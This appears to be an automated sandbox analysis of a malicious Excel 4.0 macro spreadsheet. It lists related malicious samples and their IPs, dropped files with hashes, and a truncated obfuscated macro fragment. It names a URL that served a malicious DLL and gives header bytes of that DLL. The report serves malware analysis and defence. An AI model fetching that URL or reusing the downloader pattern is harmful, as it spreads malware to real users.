      • 8.211.4.209
      L87N50MbDG.exeGet hashmaliciousBrowse
      • 8.209.67.151
      documents-683917632.xlsmGet hashmaliciousBrowse
      • 8.211.4.209
      documents-683917632.xlsmGet hashmaliciousBrowse
      • 8.211.4.209
      documents-1760163871.xlsmGet hashmaliciousBrowse
      • 8.211.4.209
      documents-1760163871.xlsmGet hashmaliciousBrowse
      • 8.211.4.209
      Proforma invoice.docGet hashmaliciousBrowse
      • 47.244.190.114
      yPkfbflyoh.exeGet hashmaliciousBrowse
      • 8.208.95.18
      4CwmE1pYh5.exeGet hashmaliciousBrowse
      • 47.91.72.80
      com.multicamera.coolwending.translator.apkGet hashmaliciousBrowse
      • 47.253.30.230
      UNIFIEDLAYER-AS-1USRFQ_AP65425652_032421 v#U00e1#U00ba#U00a5n #U00c4#U2018#U00e1#U00bb ,pdf.exeGet hashmaliciousBrowse
      • 74.220.199.6
      Order.exeGet hashmaliciousBrowse
      • 192.254.225.101
      FED8GODpaD.xlsbGet hashmaliciousBrowse
      • 108.167.180.111
      1A8C92C-1A8C92C.xlsGet hashmaliciousBrowse
      • 192.232.249.186
      1A8C92C-1A8C92C.xlsGet hashmaliciousBrowse
      • 192.232.249.186
      SecuriteInfo.com.Trojan.Agent.FFFK.8079.xlsGet hashmaliciousBrowse
      • 192.232.249.186
      SecuriteInfo.com.Trojan.Agent.FFFK.23764.xlsGet hashmaliciousBrowse
      • 192.232.249.186
      SecuriteInfo.com.Heur.19090.xlsGet hashmaliciousBrowse
      • 192.232.249.186
      SALM0BRU.exeGet hashmaliciousBrowse
      • 162.241.148.243
      Purchase Order.8000.scan.pdf...exeGet hashmaliciousBrowse
      • 162.241.148.243
      SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
      • 192.232.249.186
      SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
      • 192.232.249.186
      document-1251000362.xlsmGet hashmaliciousBrowse
      • 192.185.48.186
      document-1251000362.xlsmGet hashmaliciousBrowse
      • 192.185.48.186
      catalogue-41.xlsbGet hashmaliciousBrowse
      • 108.167.180.111
      documents-1660683173.xlsmGet hashmaliciousBrowse
      • 192.185.56.250
      06iKnPFk8Y.dllGet hashmaliciousBrowse
      • 162.241.54.59
      06iKnPFk8Y.dllGet hashmaliciousBrowse
      • 162.241.54.59
      ddff.exeGet hashmaliciousBrowse
      • 108.179.235.108
      PowerShell_Input.ps1Get hashmaliciousBrowse
      • 162.241.61.203
      PUBLIC-DOMAIN-REGISTRYUSFED8GODpaD.xlsbGet hashmaliciousBrowse
      • 5.100.152.162
      New Order PO#121012020_____PDF_______.exeGet hashmaliciousBrowse
      • 208.91.199.225
      document-1251000362.xlsmGet hashmaliciousBrowse
      • 199.79.62.99
      document-1251000362.xlsmGet hashmaliciousBrowse
      • 199.79.62.99
      document-1055791644.xlsGet hashmaliciousBrowse
      • 103.50.162.157
      catalogue-41.xlsbGet hashmaliciousBrowse
      • 5.100.152.162
      documents-1660683173.xlsmGet hashmaliciousBrowse
      • 111.118.215.222
      swift Copy.xls.exeGet hashmaliciousBrowse
      • 208.91.199.225
      document-1848152474.xlsmGet hashmaliciousBrowse
      • 199.79.62.99
      FN vw Safety 1 & 2.exeGet hashmaliciousBrowse
      • 208.91.199.223
      MV TBN.uslfze.exeGet hashmaliciousBrowse
      • 208.91.199.224
      purchase order.exeGet hashmaliciousBrowse
      • 208.91.199.223
      AD1-2001028L.exeGet hashmaliciousBrowse
      • 208.91.199.224
      AD1-2001028L (2).exeGet hashmaliciousBrowse
      • 208.91.199.224
      document-1048628209.xlsGet hashmaliciousBrowse
      • 5.100.155.169
      document-1771131239.xlsGet hashmaliciousBrowse
      • 5.100.155.169
      document-1370071295.xlsGet hashmaliciousBrowse
      • 5.100.155.169
      document-69564892.xlsGet hashmaliciousBrowse
      • 5.100.155.169
      document-1320073816.xlsGet hashmaliciousBrowse
      • 5.100.155.169
      document-184653858.xlsGet hashmaliciousBrowse
      • 5.100.155.169
      PUBLIC-DOMAIN-REGISTRYUSFED8GODpaD.xlsbGet hashmaliciousBrowse
      • 5.100.152.162
      New Order PO#121012020_____PDF_______.exeGet hashmaliciousBrowse
      • 208.91.199.225
      document-1251000362.xlsmGet hashmaliciousBrowse
      • 199.79.62.99
      document-1251000362.xlsmGet hashmaliciousBrowse
      • 199.79.62.99
      document-1055791644.xlsGet hashmaliciousBrowse
      • 103.50.162.157
      catalogue-41.xlsbGet hashmaliciousBrowse
      • 5.100.152.162
      documents-1660683173.xlsmGet hashmaliciousBrowse
      • 111.118.215.222
      swift Copy.xls.exeGet hashmaliciousBrowse
      • 208.91.199.225
      document-1848152474.xlsmGet hashmaliciousBrowse
      • 199.79.62.99
      FN vw Safety 1 & 2.exeGet hashmaliciousBrowse
      • 208.91.199.223
      MV TBN.uslfze.exeGet hashmaliciousBrowse
      • 208.91.199.224
      purchase order.exeGet hashmaliciousBrowse
      • 208.91.199.223
      AD1-2001028L.exeGet hashmaliciousBrowse
      • 208.91.199.224
      AD1-2001028L (2).exeGet hashmaliciousBrowse
      • 208.91.199.224
      document-1048628209.xlsGet hashmaliciousBrowse
      • 5.100.155.169
      document-1771131239.xlsGet hashmaliciousBrowse
      • 5.100.155.169
      document-1370071295.xlsGet hashmaliciousBrowse
      • 5.100.155.169
      document-69564892.xlsGet hashmaliciousBrowse
      • 5.100.155.169
      document-1320073816.xlsGet hashmaliciousBrowse
      • 5.100.155.169
      document-184653858.xlsGet hashmaliciousBrowse
      • 5.100.155.169

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\index[1].htm
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:downloaded
      Size (bytes):138083
      Entropy (8bit):5.497215326378405
      Encrypted:false
      SSDEEP:1536:tm15JsYYm3GCVS7ZicTJzRVd620ZmB9RMli0msUdqZEACW4jySTLW:eLsacThRVd6pmBPM07vYZEA4/W
      MD5:A26AB60FB8F4C1FCB0A37955433F241B
      SHA1:E5316BCF28CA90B78A7CDBDE64B2DBC05A7A8D3B
      SHA-256:3D383CC929E2A80A8466767FAF9726E56CDA26DEC1D9249DF447629A6A113BB6
      SHA-512:CA5CA64E4A7A6A366BB1335C9339D40ECC2ECC9B393AC6D0DB74FA0D995155E39286FB9FBE096C252A2AD7E33A892039960503A0DE1F9805CCDD8E197525D2AD
      Malicious:true
      Antivirus:
      • Antivirus: Joe Sandbox ML, Detection: 100%
      Reputation:low
      IE Cache URL:http://bodylanguage.santulan.co.in/ds/index.html
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._W...6e..6e..6e.)v..6e...w..6e.Rich.6e.................PE..L.....f`...........!................ko..................................................................................d............................................................................................................................code.............................. ..`.data...d...........................@..@.data...............................@....rdata... .......".......................data...............................@...................................................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\45BFE498.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):8301
      Entropy (8bit):7.970711494690041
      Encrypted:false
      SSDEEP:192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh
      MD5:D8574C9CC4123EF67C8B600850BE52EE
      SHA1:5547AC473B3523BA2410E04B75E37B1944EE0CCC
      SHA-256:ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
      SHA-512:20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview: .PNG........IHDR.......:......IJ.....sRGB.........pHYs..........+.... .IDATx^..\....}.\6"Sp...g..9Ks..r..=r.U....Y..l.S.2...Q.'C............h}x........... ......\..N...z....._.|......III.666...~~~..6l.Q.J...\..m..g.h.SRR.\.p....'N...EEE...X9......c.&M...].n.g4..E..g...w...{..]..;w..I...y.m\...~..;.].3{~..qV.k..._....?..w/$GlI|..2. m,,,.-[.....sr.V1..g...on...........dl.'...'''[[[.R.......(..^...F.PT.Xq..Mnnn.3..M..g.......6.....pP"#F..P/S.L...W.^..o.r.....5H......111t....|9..3...`J..>...{..t~/F.b..h.P..]z..)......o..4n.F..e...0!!!......#""h.K..K.....g.......^..w.!.$.&...7n.].F.\\\.A....6lxjj.K/........g.....3g......f....:t..s..5.C4..+W.y...88..?.,Y. .^...8{.@VN.6....Kbch.=zt...7+T....v.z....P........VVV..."t.N......$..Jag.v.U...P[(_.I?.9.4i.G.$U..D......W.r...........!>|..#G...3..x.b......P....H!.Vj......u.2..*;..Z..c..._Ga....&L.......`.1.[.n].7..W_m..#8k...)U..L.....G..q.F.e>..s.......q....J....(.N.V...k..>m....=.).
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4647BF2F.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 364 x 139, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):8854
      Entropy (8bit):7.949751503848125
      Encrypted:false
      SSDEEP:192:VS+uZNogNC+NXtYvselFpeBnmMYCft0gVaSgZTaG+3uWYvVZmSGQ9pFT+x5ylxvr:03CbJ+mMYCmgUrNaB3uzvPm1UpFimlxj
      MD5:780FD0ABF9055E2D8FA1BAB6D4B9163E
      SHA1:CFCD5C73C9C517161DEC8D4B01ABFCA4B272AEBE
      SHA-256:6A3CDBFDB8911742673C2882E912369BC525A7BD41C9B6EFC5C9A84DAFF6C3B2
      SHA-512:8359AF512FA5771EB542B1A854F15E74555C7E1F956924520AC6CEBBAE1322D27AC8FBDD390275C5A31223613986B0CBF5871A406CA2DDBB996B9EB7A94E871A
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview: .PNG........IHDR...l.........E..7....pHYs.................tEXtSoftware.Adobe ImageReadyq.e<.."#IDATx..]M.$.u.Y...V.Z!$......C.H2>.....JBR....c.2..k....'.f......qg..7O.W..0.'.bO6x...l..#!W...`h.~......Y...*+..._.x.".....#.....[........C.ISj..i..i.peOD..BT.N....IoD..qS..M{.I.D...!...[."A....GM........I.M......'T#D....&Q.H.."...Cqn"l....&.G.Mo....MI......u&.~.#k............R...<Q7%o~}.$d..L..j.<l..<...N.K.M"l.aU...G,N...v....LE..Y@.l....;n.?.Z%.&.V.....,.d".K^bM..B. ....B.l"l.a.....<...q...."K.....{.,...j.&...F.@xU......i.q..R.`u#<...........mR...j+ ..^.x...1TR..qw"l....&.a.W...}v.......S.zT..a...J.0....5... E..i"l.a%..<............lSM.a...N.........hI....."D...R.u....."Q.K.#.gM)}.L...*..b..D.y9{.kR7aA....:_..LL#......M...).{.l..O..lv...lP0l+....Y.Y.5.....j@$.C.h!qy/.D..%...g.c...D.......X..M$O.v%Z..S.%w..1"l....B'.O.I..B..}.............iL...X..3..`[.g...j..J.'...Y...rr..@m....@.uC.#......e!.4...M.a.y.......&h.o...Y.Q...@....N]6..."H.
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\52AB2BB9.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):557
      Entropy (8bit):7.343009301479381
      Encrypted:false
      SSDEEP:12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
      MD5:A516B6CB784827C6BDE58BC9D341C1BD
      SHA1:9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
      SHA-256:EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
      SHA-512:C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8Oc.......l.9a._.X....@.`ddbc.]...........O..m7.r0|..."......?A.......w..;.N1u........_.[.\Y...BK=...F +.t.M~..oX..%....211o.q.P.".......y...../..l.r...4..Q]..h.....LL.d.......d....w.>{.e..k.7.9y.%.. .YpI...{.+Kv......./..\[...A....^.5c..O?.......G...VB..4HWY...9NU...?..S..$..1..6.U.....c... ....7..J. "M..5. ............_.......d.V.W.c.....Y.A..S....~.C.....q........t?..."n.....4......G_......Q..x..W.!L.a...3....MR.|.-P#P;..p._.......jUG....X........IEND.B`.
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AB2DEE66.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):848
      Entropy (8bit):7.595467031611744
      Encrypted:false
      SSDEEP:24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
      MD5:02DB1068B56D3FD907241C2F3240F849
      SHA1:58EC338C879DDBDF02265CBEFA9A2FB08C569D20
      SHA-256:D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
      SHA-512:9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8O.T]H.Q..;3...?..fk.lR..R$.R.Pb.Q...B..OA..T$.hAD...J../..-h...fj..+....;s.vg.Zsw.=...{.w.s.w.@.....;..s...O........;.y.p........,...s1@ Ir.:... .>.LLa..b?h...l.6..U....1....r.....T..O.d.KSA...7.YS..a.(F@....xe.^.I..$h....PpJ...k%.....9..QQ....h..!H*................./....2..J2..HG....A....Q&...k...d..&..Xa.t..E....E..f2.d(..v.~.P.+.pik+;...xEU.g....._xfw...+...(..pQ.(..(.U./..)..@..?..........f.'...lx+@F...+....)..k.A2...r~B,....TZ..y..9...`..0....q....yY....Q.......A.....8j[.O9..t..&...g. I@ ..;..X!...9S.J5..'.xh...8I.~.+...mf.m.W.i..{...+>P...Rh...+..br^$. q.^.......(..._.j...$..Ar...MZm|...9..E..!U[S.fDx7<....Wd.......p..C......^MyI:...c.^..SI.mGj,.......!...h..$..;...........yD./..a...-j.^:.}..v....RQY*.^......IEND.B`.
      C:\Users\user\AppData\Local\Temp\FBCE0000
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):96847
      Entropy (8bit):7.870690149733864
      Encrypted:false
      SSDEEP:1536:m/JIWQub3DLc6SqhlWxDbl2hawHusD9Byrty30wEGttZv9xEfgI:GJIW9bTdS7lMHfD9ByrtyOG7ZVxET
      MD5:00AF2D8EB13A69B0A52ABFB800D69F9F
      SHA1:3AF09FD82CCA333CC70CB6394A7EC315F5FE6AF1
      SHA-256:0B91BE6A537CF8CA45B5CAD74C244466C36150D0814A624D1A98CEF08B69F603
      SHA-512:2214669F1315B5F60B2E300B873AC98EBF2A0C57943FCEEB4ED41D431C6D8708D5EAD2A7F2D510C45AAC2321CC45292EEE7E504CD304A618DCC65A69DEAFE226
      Malicious:false
      Reputation:low
      Preview: .U.N.0..#.?D....#4j.b........mb./..h..k7.......>......."j.Zv.LX.Nz.]..wW.9.0.....Z..d...'.u....e}J.7.({........G+.....B.E..l2..w.\.S.`.._X.{....].8.k.?...T.D.FK..(.pjG.........D.`. ....&DM...R.`..^...Mm..|}?"........%..:.O*.B^9...G.....F.t-,..W.?...{.l...2-..`..Xc......Z..=;<.T.....;$.>$../').#>.....y..m..za.....b.}S.D..x..|.f$8.......1.^DP...t...^s..PQ<f.|......c.4.n..H.4.....=.]."..4l....U...q....y.+P{.yy.........PK..........!...`.............[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Apr 7 15:14:37 2021, atime=Wed Apr 7 15:14:37 2021, length=8192, window=hide
      Category:dropped
      Size (bytes):867
      Entropy (8bit):4.489142053628293
      Encrypted:false
      SSDEEP:12:85QENcLgXg/XAlCPCHaXtB8XzB/XURvX+WnicvbRbDtZ3YilMMEpxRljK5TdJP9O:85JK/XTd6j0YeBDv3qYrNru/
      MD5:9C40617F346B87D23DC5454B7267E33A
      SHA1:B87124245ACDB8EDF4EE972366790CC463CDBDDC
      SHA-256:223CD23880148DA3DEC1729E43E7735385478231A1BDE95A0E89C438C420623B
      SHA-512:097B24FAE265EC38060C7B05B10025503D2E49FC3E099853E913841E42C6E7BB4AA0EE7EA6F39710C6533D49C3CAEA3E24E42A16D1F127587794E4CCCBE1D3E1
      Malicious:false
      Preview: L..................F...........7G..A(O..+..A(O..+... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R...Desktop.d......QK.X.R.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\472847\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......472847..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\documents-2112491607.LNK
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Apr 7 15:14:37 2021, atime=Wed Apr 7 15:14:37 2021, length=96847, window=hide
      Category:dropped
      Size (bytes):2138
      Entropy (8bit):4.547087478186962
      Encrypted:false
      SSDEEP:24:8bz2/XTd6jFyD2nhe8WDv3qYdM7dD2bz2/XTd6jFyD2nhe8WDv3qYdM7dV:8+/XT0jFY2nhdYQh2+/XT0jFY2nhdYQ/
      MD5:FD2F42E72FB642FA79B3F38914DB4B03
      SHA1:96D1AD382852122C29334DFB5CE89A13DD14C8F3
      SHA-256:8C69F2F1A47257D91955C5E9AC888608AA6234EEECFEAD7BCEB4B268B747ECBA
      SHA-512:069397B0B527C31C843AAEBF778965D48E446F0958B536D57CE7C5DA68A801C90FA90699DFBFD1C68FCC93FB06EBFA5A6BE204BAA47FD089F4597C050A8073BB
      Malicious:false
      Preview: L..................F.... ......{..A(O..+...p]..+..Oz...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....|.2.mz...R. .DOCUME~1.XLS..`.......Q.y.Q.y*...8.....................d.o.c.u.m.e.n.t.s.-.2.1.1.2.4.9.1.6.0.7...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\472847\Users.user\Desktop\documents-2112491607.xlsm.0.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.s.-.2.1.1.2.4.9.1.6.0.7...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......472847.........
      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):115
      Entropy (8bit):4.745678829632436
      Encrypted:false
      SSDEEP:3:oyBVomxWKS9LRzcOHZELRzcOHmxWKS9LRzcOHv:dj49Ll5ELlt9LlP
      MD5:153B80C9C6025C6926C8F0A15B781156
      SHA1:A4B5E632F8E2282BA31EF56938E23F0BAC5DAD1F
      SHA-256:1E02E4944F11BD25D085F2B96AECB9912DEBC942C411D1E85603DFFCF69E2F65
      SHA-512:7EDD7295338EFC23F23A3B55F3AD1832A297701F58CB68AF080594D8C119BA3FBAB32BC55DCFBA231C65E40E5CA313A74217B2B8948F035ECA6979281E4165F4
      Malicious:false
      Preview: Desktop.LNK=0..[misc]..documents-2112491607.LNK=0..documents-2112491607.LNK=0..[misc]..documents-2112491607.LNK=0..
      C:\Users\user\Desktop\ECCE0000
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):96847
      Entropy (8bit):7.870690149733864
      Encrypted:false
      SSDEEP:1536:m/JIWQub3DLc6SqhlWxDbl2hawHusD9Byrty30wEGttZv9xEfgI:GJIW9bTdS7lMHfD9ByrtyOG7ZVxET
      MD5:00AF2D8EB13A69B0A52ABFB800D69F9F
      SHA1:3AF09FD82CCA333CC70CB6394A7EC315F5FE6AF1
      SHA-256:0B91BE6A537CF8CA45B5CAD74C244466C36150D0814A624D1A98CEF08B69F603
      SHA-512:2214669F1315B5F60B2E300B873AC98EBF2A0C57943FCEEB4ED41D431C6D8708D5EAD2A7F2D510C45AAC2321CC45292EEE7E504CD304A618DCC65A69DEAFE226
      Malicious:false
      Preview: .U.N.0..#.?D....#4j.b........mb./..h..k7.......>......."j.Zv.LX.Nz.]..wW.9.0.....Z..d...'.u....e}J.7.({........G+.....B.E..l2..w.\.S.`.._X.{....].8.k.?...T.D.FK..(.pjG.........D.`. ....&DM...R.`..^...Mm..|}?"........%..:.O*.B^9...G.....F.t-,..W.?...{.l...2-..`..Xc......Z..=;<.T.....;$.>$../').#>.....y..m..za.....b.}S.D..x..|.f$8.......1.^DP...t...^s..PQ<f.|......c.4.n..H.4.....=.]."..4l....U...q....y.+P{.yy.........PK..........!...`.............[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\Desktop\~$documents-2112491607.xlsm
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):330
      Entropy (8bit):1.4377382811115937
      Encrypted:false
      SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
      MD5:96114D75E30EBD26B572C1FC83D1D02E
      SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
      SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
      SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
      Malicious:true
      Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      C:\Users\user\oeiwkd4.dll
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):138083
      Entropy (8bit):5.497215326378405
      Encrypted:false
      SSDEEP:1536:tm15JsYYm3GCVS7ZicTJzRVd620ZmB9RMli0msUdqZEACW4jySTLW:eLsacThRVd6pmBPM07vYZEA4/W
      MD5:A26AB60FB8F4C1FCB0A37955433F241B
      SHA1:E5316BCF28CA90B78A7CDBDE64B2DBC05A7A8D3B
      SHA-256:3D383CC929E2A80A8466767FAF9726E56CDA26DEC1D9249DF447629A6A113BB6
      SHA-512:CA5CA64E4A7A6A366BB1335C9339D40ECC2ECC9B393AC6D0DB74FA0D995155E39286FB9FBE096C252A2AD7E33A892039960503A0DE1F9805CCDD8E197525D2AD
      Malicious:true
      Antivirus:
      • Antivirus: Joe Sandbox ML, Detection: 100%
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._W...6e..6e..6e.)v..6e...w..6e.Rich.6e.................PE..L.....f`...........!................ko..................................................................................d............................................................................................................................code.............................. ..`.data...d...........................@..@.data...............................@....rdata... .......".......................data...............................@...................................................................................................................................................................................................................................................................................................................................................................................

      Static File Info

      General

      File type:Microsoft Excel 2007+
      Entropy (8bit):7.8821840433354
      TrID:
      • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
      • ZIP compressed archive (8000/1) 16.67%
      File name:documents-2112491607.xlsm
      File size:96877
      MD5:cada6b07929cd03002206f65f547f383
      SHA1:e4b72830f1f320d711f60f540a8fe9340597238e
      SHA256:b9b231cad810dedef1d27772b12d04e8aa4e9ef0f461d5a0fbf80d3c38918860
      SHA512:930c2ed9bf01b1c22189985f47800b11b2d116d5210a6f712f12ea25d7d4d52c165b7c9531d902487e341d9ebf35c4f3768ada1299b0ad9cab91d95f1b36fc15
      SSDEEP:1536:4h1M4Kfra8zxQz8jbztonsBjFC6QomaIRUxPLe96bGAfe2hawno:4h1M4kra8Wz8jbzSn4BC6Qdkx60WMo
      File Content Preview:PK..........!...`.............[Content_Types].xml ...(.........................................................................................................................................................................................................

      File Icon

      Icon Hash:e4e2aa8aa4bcbcac

      Static OLE Info

      General

      Document Type:OpenXML
      Number of OLE Files:1

      OLE File "documents-2112491607.xlsm"

      Indicators

      Has Summary Info:
      Application Name:
      Encrypted Document:
      Contains Word Document Stream:
      Contains Workbook/Book Stream:
      Contains PowerPoint Document Stream:
      Contains Visio Document Stream:
      Contains ObjectPool Stream:
      Flash Objects Count:
      Contains VBA Macros:

      Macro 4.0 Code

      ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""..\oeiwkd""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUM